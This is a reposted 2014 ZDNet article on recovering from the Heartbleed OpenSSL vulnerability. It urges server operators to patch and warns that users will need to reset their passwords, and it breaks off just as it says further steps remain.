10 April 2014

How to recover from Heartbleed

Summary: For companies, installing patched OpenSSL software is just the first step in fixing the Heartbleed security problem. End users face a long haul, too. A lot of work needs to be done before we're safe from Heartbleed.

By Steven J. Vaughan-Nichols April 9, 2014 -- 19:15 GMT (12:15 PDT)
Source: http://www.zdnet.com/how-to-recover-from-heartbleed-7000028253/?s_cid=e589&ttag=e589&ftag=TREc64629f

Here's the good news: The patches for the OpenSSL Heartbleed security hole are now available for all major operating systems. Here's the bad news: Simply installing the patch isn't enough to protect your servers and users from attackers. Here's the worst news: All your users—yes all of them—are going to need to reset every last one of their passwords.


You may want to ignore this problem. You don't dare do so. So long as you're running unpatched OpenSSL 1.01 or 1.02beta it will be  trivial for hackers to crack your security systems and access both your own server and your users information. Adding insult to injury, this hole has existed on any system using the latest version of OpenSSL since early 2012. Other SSL implementations, such as Microsoft's Azure SSL, are not affected by this bug.
This means that if you've been running a "secure" Apache or NGNIX Web server--about two-thirds of all Web sites--your site, potentially, has been open to attack for years. Indeed, if you've been running any network services that use OpenSSL for security, such as the Tor secure network, the Goldbug secure instant messenger, or many e-mail systems, includingYahoo Mail, it's possible that your information has been being silently harvested by attackers.
I doubt there have been massive data raids by criminals, though, simply because I think we'd all notice if billions of dollars of fake credit-card transactions started appearing on our bills. Now, what the NSA has been doing with SSL vulnerabilities is, of course, another question entirely.
But, now that everyone knows that the hole is out there, and that it's as wide-open as an interstate highway at 2 in the morning, you dare not wait a minute to update your OpenSSL software. But, after you're patched your servers, you're still not done.

No comments: